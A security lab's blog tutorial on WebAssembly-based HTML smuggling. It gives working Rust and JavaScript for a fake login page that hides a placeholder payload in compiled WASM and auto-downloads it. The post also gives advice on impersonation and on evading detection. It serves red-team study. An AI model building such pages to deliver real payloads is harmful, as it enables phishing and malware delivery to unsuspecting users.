LRQA Cyber Labs

Next Level Smuggling with WebAssembly

Mike Bone, Senior Software Developer

GitHub: wasm-smuggler


Background

HTML smuggling remains one of the most reliable ways to deliver malicious payloads into an environment during social engineering attacks. A harmless-looking web page hands the user a benign-looking file or payload, which can then execute harmful functionality.

One of the core benefits of HTML smuggling lies in the ability to embed the payload entirely inside an HTML page. This requires no extra requests, server downloads or any other networking that could be inspected, tracked and blocked.

There are many effective ways to hide a payload on a page which is visited by unsuspecting users. Commonly, these have included Base64 encoding or RC4 encryption, obfuscation techniques like string splitting or character substitution, or even HTML5 storage utilising local or session storage to hide and then later reconstruct payloads. 

However, as the world wide web evolves, “web3” becomes more popular, and security measures get more effective, there are both opportunities and requirements for new techniques. This article shows how WebAssembly (WASM) can be used for HTML smuggling.

 

WebAssembly (WASM)

WASM is a binary instruction format designed as a portable compilation target for programming languages such as C/C++, C# and Rust. It provides a way to run code in these languages at near-native speed, while complementing JavaScript and leveraging its web capabilities. Essentially, developers can write code for the browser in these languages and compile them to WASM files which in turn can then be loaded by a web page and their functions invoked.
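
To make the load-and-invoke step concrete, the following is a minimal sketch (not part of the original project) that instantiates a tiny hand-assembled module from raw bytes and calls its export. The module, its add function and the variable names are illustrative assumptions; it uses the synchronous WebAssembly.Module and WebAssembly.Instance constructors, which suit a module this small.

```javascript
// Hand-assembled module exporting add(a: i32, b: i32) -> i32 (illustrative only)
const addModuleBytes = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, // "\0asm" magic + version 1
  0x01, 0x07, 0x01, 0x60, 0x02, 0x7f, 0x7f, 0x01, 0x7f, // type section: (i32, i32) -> i32
  0x03, 0x02, 0x01, 0x00, // function section: one function using type 0
  0x07, 0x07, 0x01, 0x03, 0x61, 0x64, 0x64, 0x00, 0x00, // export section: "add" -> function 0
  0x0a, 0x09, 0x01, 0x07, 0x00, // code section: one body, no locals
  0x20, 0x00, 0x20, 0x01, 0x6a, 0x0b, // local.get 0, local.get 1, i32.add, end
]);

// Compile and instantiate the bytes, then call the exported function from JavaScript
const addModule = new WebAssembly.Module(addModuleBytes);
const addInstance = new WebAssembly.Instance(addModule, {});
const sum = addInstance.exports.add(2, 3);

console.log(sum); // 5
```

Real-world modules are normally produced by a compiler toolchain rather than written by hand, but the loading path from JavaScript is the same.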

So, why does this benefit HTML smuggling? The most obvious answer, and the one we will focus on, is the obfuscation and stealth that WASM provides, which can be used for smuggling malicious payloads. As a binary format, WASM inherently makes reading code, detecting threats, and reverse-engineering far more difficult than with JavaScript. The only comparable option within JavaScript is V8 bytecode, but this has pitfalls, such as requiring the target system to run the exact same V8 version that was used to compile the bytecode.

 

WASM Smuggler Concept

For our example, we will make use of wasm-pack, a tool for creating Rust-generated WASM that interoperates nicely with JavaScript. The flow we will create is a simple username and password login page that validates only for specific credentials configured client-side and, on success, automatically downloads a malicious payload. Validation and payload generation will both live inside the Rust WASM to maximise obfuscation. Additionally, we will make this a single HTML file that contains everything we need, so it is easy to serve to users and avoids unnecessary extra network requests.

This tutorial will assume some basic knowledge of Rust including getting Rust & wasm-pack installed.

Rust

First, we need to write the Rust code that will be converted into WASM. The minimum we need to consider is:

  1. Defining the accepted credentials to verify against.
  2. Validating user input against the accepted credentials.
  3. Setting the payload that will be downloaded on success.

For simplicity, we can store the username, password and the payload all as static strings at the top of src/lib.rs in a newly created Rust project with a library target (cargo init --lib wasm). To ensure no issues with encoding, we will store them all in Base64.

// "myusername"
static USERNAME: &str = "bXl1c2VybmFtZQ==";

// "mypassword"
static PASSWORD: &str = "bXlwYXNzd29yZA==";

// The payload
static PAYLOAD: &str = "R290ZW0hCg==";
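
As a quick sanity check, the stored values can be reproduced with any Base64 tool. A minimal sketch using the btoa and atob globals available in browsers and recent Node.js versions (the variable names here are illustrative and not part of the project):

```javascript
// Encode the plain-text credentials to the Base64 strings stored in lib.rs
const encodedUsername = btoa("myusername"); // "bXl1c2VybmFtZQ=="
const encodedPassword = btoa("mypassword"); // "bXlwYXNzd29yZA=="

// Decode the stored payload to see what will be written to the downloaded file
const decodedPayload = atob("R290ZW0hCg=="); // "Gotem!\n"

console.log(encodedUsername, encodedPassword, JSON.stringify(decodedPayload));
```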

We then need a function that can validate the user credentials. It needs to receive the username and password from the JavaScript side and then on successful validation, it can return the payload as a stored Base64 string:

pub async fn validate_user(u: &str, p: &str) -> String {
    // Decode the stored Base64 credentials back into plain strings
    let username_vec: Vec<u8> = base64::decode(USERNAME).expect("Failed to decode");
    let username_string: String = str::from_utf8(&username_vec).unwrap().to_string();
    let password_vec: Vec<u8> = base64::decode(PASSWORD).expect("Failed to decode");
    let password_string: String = str::from_utf8(&password_vec).unwrap().to_string();

    // Return an empty string if either credential does not match
    if u != username_string || p != password_string {
        return String::new();
    }

    // Credentials match: hand back the Base64-encoded payload
    PAYLOAD.to_string()
}

To make the function accessible from the JavaScript side, we need to expose it. This can be achieved by annotating the function with #[wasm_bindgen] to let wasm-pack know our intention:

#[wasm_bindgen]
pub async fn validate_user(u: &str, p: &str) -> String {

This will be enough Rust code to get our concept working. Finally, ensure the right imports are included at the top of the file:

use std::str;
use wasm_bindgen::prelude::*;

Define dependencies within the Cargo.toml:

[dependencies]
wasm-bindgen = "0.2"
wasm-bindgen-futures = "0.4"
base64 = "0.13"

Set the crate-type so that the library can be compiled for WebAssembly:

[lib]
crate-type = ["cdylib"]

Then, use wasm-pack to build it:

wasm-pack build --target no-modules --release

Specifying --release enables build optimisations and disables debug assertions. There are a few targets to choose from, but no-modules provides an easy way for us to incorporate the output into a single "all-in-one" .html page. The command writes several files to /pkg, but the two we will focus on are the .wasm and .js files. Inspecting the .wasm file (the "WebAssembly" plugin for VS Code provides a great WASM inspector) gives a good picture of the obfuscation at hand: it contains our compiled Rust code along with the "hidden" credentials and payload.

JavaScript

The accompanying JavaScript file generated in the /pkg folder is the necessary helper script that will allow us to easily leverage the WASM in our HTML page. Because we chose --target no-modules, this contains a single global scope variable wasm_bindgen that we use to destructure our exposed WASM functions, followed by an IIFE (immediately invoked function expression) that defines it. 

However, if we want to include all of this inside the script tags of our single-file HTML page then we need to make one adjustment. By default, the __wbg_init function in the helper JavaScript file loads the WASM by fetching the .wasm file and loading it into memory.

Instead, we can embed the .wasm file as a Base64 string and set the input to an ArrayBuffer of bytes decoded from that string.

async function __wbg_init(input) {
  if (wasm !== undefined) return wasm;

  const imports = __wbg_get_imports();
  const base64Wasm = "{{BASE64_ENCODED_WASM}}";

  function base64ToArrayBuffer(base64) {
    var binary_string = window.atob(base64);
    var len = binary_string.length;
    var bytes = new Uint8Array(len);
    for (var i = 0; i < len; i++) {
      bytes[i] = binary_string.charCodeAt(i);
    }
    return bytes.buffer;
  }

  if (typeof input === "undefined") {
    input = base64ToArrayBuffer(base64Wasm);
  }
  __wbg_init_memory(imports);

  const { instance, module } = await __wbg_load(await input, imports);
  return __wbg_finalize_init(instance, module);
}
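
In isolation, the Base64-to-bytes step looks like the sketch below. It is an illustration rather than part of the generated helper: base64ToBytes and the variable names are assumptions, and the embedded string is simply the eight-byte header of an empty WebAssembly module rather than the wasm-pack output.

```javascript
// Decode a Base64 string into a Uint8Array (same approach as base64ToArrayBuffer above)
function base64ToBytes(base64) {
  const binary = atob(base64);
  const bytes = new Uint8Array(binary.length);
  for (let i = 0; i < binary.length; i++) {
    bytes[i] = binary.charCodeAt(i);
  }
  return bytes;
}

// "\0asm" magic number followed by version 1: the smallest valid module
const emptyModuleBase64 = "AGFzbQEAAAA=";
const moduleBytes = base64ToBytes(emptyModuleBase64);

// WebAssembly.validate reports whether the bytes form a well-formed module
const isValidModule = WebAssembly.validate(moduleBytes);

console.log(moduleBytes.length, isValidModule); // 8 true
```

Because the bytes come from a string already present in the page, no separate request for a .wasm file is made.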

Now we have JavaScript that in turn loads the WASM, all self-contained and ready to be put inside a script tag of an HTML page, but we still need to actually make use of it.

The rest of the JavaScript is straightforward: on form submission we run a function that takes the username and password input and passes it to the WASM function we created to check the credentials. On success we get the payload string back, which we can then download as a file to the unsuspecting user's computer. Again, we destructure the exposed WASM functions from the global wasm_bindgen provided by the helper JavaScript, which should first be copied to the top of our script.

// Destructure the validate user function from the WASM
const { validate_user } = wasm_bindgen;

// Base64 to array buffer function
function b642ab(base64) {
  var binary_string = window.atob(base64);
  var len = binary_string.length;
  var bytes = new Uint8Array(len);
  for (var i = 0; i < len; i++) {
    bytes[i] = binary_string.charCodeAt(i);
  }
  return bytes.buffer;
}

document.addEventListener("DOMContentLoaded", function () {
  document.querySelector("form").addEventListener("submit", async function (event) {
    // Prevent default form submission behaviour
    event.preventDefault();

    // Get user input
    const user = document.getElementById("username").value;
    const pass = document.getElementById("password").value;

    // Initialise the WASM, then validate user and password - if successful then file base64 is returned
    await wasm_bindgen();
    const fileb64 = await validate_user(user, pass);

    if (fileb64 !== "") {
      // Convert base64 to blob
      const data = b642ab(fileb64);
      const blob = new Blob([data], { type: "application/octet-stream" });
      const filename = "gotem.txt";

      // Download the blob
      if (window.navigator && window.navigator.msSaveBlob) {
        // Legacy Internet Explorer / Edge download path
        window.navigator.msSaveBlob(blob, filename);
      } else {
        // Create a hidden link pointing at the blob and click it
        const a = document.createElement("a");
        document.body.appendChild(a);
        a.style.display = "none";
        const url = window.URL.createObjectURL(blob);
        a.href = url;
        a.download = filename;
        a.click();
        window.URL.revokeObjectURL(url);
      }
    }
  });
});

With a functioning HTML form whose username and password fields carry the IDs used above (username and password), we should have a working smuggler that downloads our malicious payload upon valid credential entry, all hidden within the Rust-generated WASM!

 

Summary

This is a very basic example, and just a functioning concept of using WASM in an HTML smuggler, but at this point serving the fully constructed HTML page and entering the correct credentials should result in the “payload” being downloaded. The source code of the HTML page, even without minification or obfuscation, doesn’t reveal much; the most conspicuous part is the large Base64-encoded WASM section. Even after decoding it, an analyst is left dealing with complex WASM code. All in all, the payload and any other content that needs to be hidden are deeply obfuscated, making it much harder for anyone (or anything) to detect and prevent the malicious content before it is too late.

The full source code used in this article can be downloaded from our GitHub below.

GitHub: wasm-smuggler

 

Improvements

There are many improvements that could be made to extend the functionality and make it more robust, such as:

HTML Page

One of the most obvious improvements would be to the HTML page itself. The form could give feedback, both on incorrect login (with some form validation) and on correct login (showing some new “post login” content). Additionally, loading animations and a delay could be added to better simulate logging in, along with theming to match whatever is being impersonated. All in all, it needs to be believable to the user, so they don’t second guess a single part of the page.

Cargo Options

You could make use of some Cargo profile options for the Rust code, such as setting strip = true to remove symbols and debug info from the binary, or looking into trim-paths to sanitise absolute paths introduced during compilation that could leave identifiable information in the compiled library.

Build Targets

The wasm-pack web build target offers more wasm-bindgen features than no-modules, giving more flexibility with what you can do. However, this would require some code changes to keep the “single HTML page” smuggler concept.

Further Obfuscation

Not only could the JavaScript be minified and obfuscated before being placed within the script tags of the HTML file, but the exposed WASM function names could be obfuscated too. Additionally, other details like the payload filename could be hidden within the WASM instead of having something like .exe searchable within the HTML source, and then all the stored info within the WASM could be further hidden with RC4 encryption where the decryption key is fetched from a server.

Error Handling

There is plenty of scope to improve error handling within the Rust code and the flow of the JavaScript, handling cases like no user input or gracefully failing if there is a problem with an exposed WASM function, etc.

And More

Success/failure web bugs, user agent filtering - there is so much more that could be included!
